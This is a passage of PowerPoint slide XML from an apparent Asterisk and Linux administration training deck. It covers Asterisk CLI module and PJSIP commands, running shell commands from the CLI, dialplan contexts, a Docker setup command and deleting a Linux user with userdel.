                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;module reload res_pjsip</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;pjsip show en</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;pjsip show endpoints</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;core reload</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;pjsip show cont</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;pjsip show contacts</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4127" name="Google Shape;4127;p670"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5178875" y="1011850"/>
            <a:ext cx="3876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1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;module show like &lt;keyword&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;module show like pjsip.so</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;module show like app_v</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	It show the voicemail</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;module show</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;module reload app_voicemail.so</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;module</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CLI&gt;module unload &lt;moduleName&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1600">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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1" name="Shape 4131"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4132" name="Google Shape;4132;p671"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271175" y="309900"/>
            <a:ext cx="8520600" cy="76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How to run linux command inside asterisk CLI ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4133" name="Google Shape;4133;p671"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="464100" y="1426400"/>
            <a:ext cx="7673700" cy="3156300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Syntax</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asteriskCLI&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;linuxCommand&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Example</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="004AAD"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>asteriskCLI&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="DC143C"/>
                </a:solidFill>
              </a:rPr>
              <a:t>!</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="3400">
                <a:solidFill>
                  <a:srgbClr val="FF00FF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>clear</a:t>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="FF00FF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:t/>
            </a:r>
            <a:endParaRPr sz="3400">
              <a:solidFill>
                <a:srgbClr val="004AAD"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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7" name="Shape 4137"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4138" name="Google Shape;4138;p672"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="271175" y="309900"/>
            <a:ext cx="8520600" cy="76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How many context can have in a </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dialplan</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> file i.e </a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>extensions</a:t>
            </a:r>
            <a:r>
              <a:rPr b="1" lang="en" sz="3120">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.conf ?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3120">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4139" name="Google Shape;4139;p672"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6573175" y="1335475"/>
            <a:ext cx="2275800" cy="3156300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[context1]</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	….</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[context2]</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	…</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="r">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>[context n]</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4140" name="Google Shape;4140;p672"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="124425" y="1372625"/>
            <a:ext cx="7201800" cy="3156300"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="t" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>We can write unlimited [context] in extensions.conf</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Context are isolated with each other</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-361950" lvl="0" marL="457200" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="6AA84F"/>
              </a:buClr>
              <a:buSzPts val="2100"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="2100">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>One context can be included in another context</a:t>
            </a:r>
            <a:endParaRPr sz="2100">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sld>
</file>

<file path=ppt/slides/slide6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4" name="Shape 4144"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4145" name="Google Shape;4145;p673"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="352350" y="262000"/>
            <a:ext cx="86064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rPr>
              <a:t>Setup Jade</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3000">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4146" name="Google Shape;4146;p673"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="394800" y="884075"/>
            <a:ext cx="8521500" cy="388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6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>docker run -d -p 8080:80/tcp -p 4433:443/tcp -p 8081-8089:8081-8089/tcp -p 8081-8089:8081-8089/udp -p 8200-8203:8200-8203/tcp -p 8200-8203:8200-8203/udp -p 5060:5060/tcp -p 5060:5060/udp -p 10000-10500:10000-10500/udp --name jade-asterisk -t pchero/jade-asterisk:v0.0.3</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="6AA84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9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="177425" y="263925"/>
            <a:ext cx="8838600" cy="77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220">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How to delete a linux users with home directory?</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3220">
              <a:solidFill>
                <a:schemeClr val="accent1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="486" name="Google Shape;486;p89"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2298275" y="1337050"/>
            <a:ext cx="5678100" cy="3472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40"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:srgbClr val="6AA84F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userdel -rf  &lt;userName&gt;</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:srgbClr val="6AA84F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="457200" lvl="0" marL="1828800" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="440"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr b="1" lang="en" sz="3420">
                <a:solidFill>
                  <a:srgbClr val="A32EFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>or</a:t>
            </a:r>
            <a:endParaRPr b="1" sz="3420">
              <a:solidFill>
                <a:srgbClr val="A32EFF"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
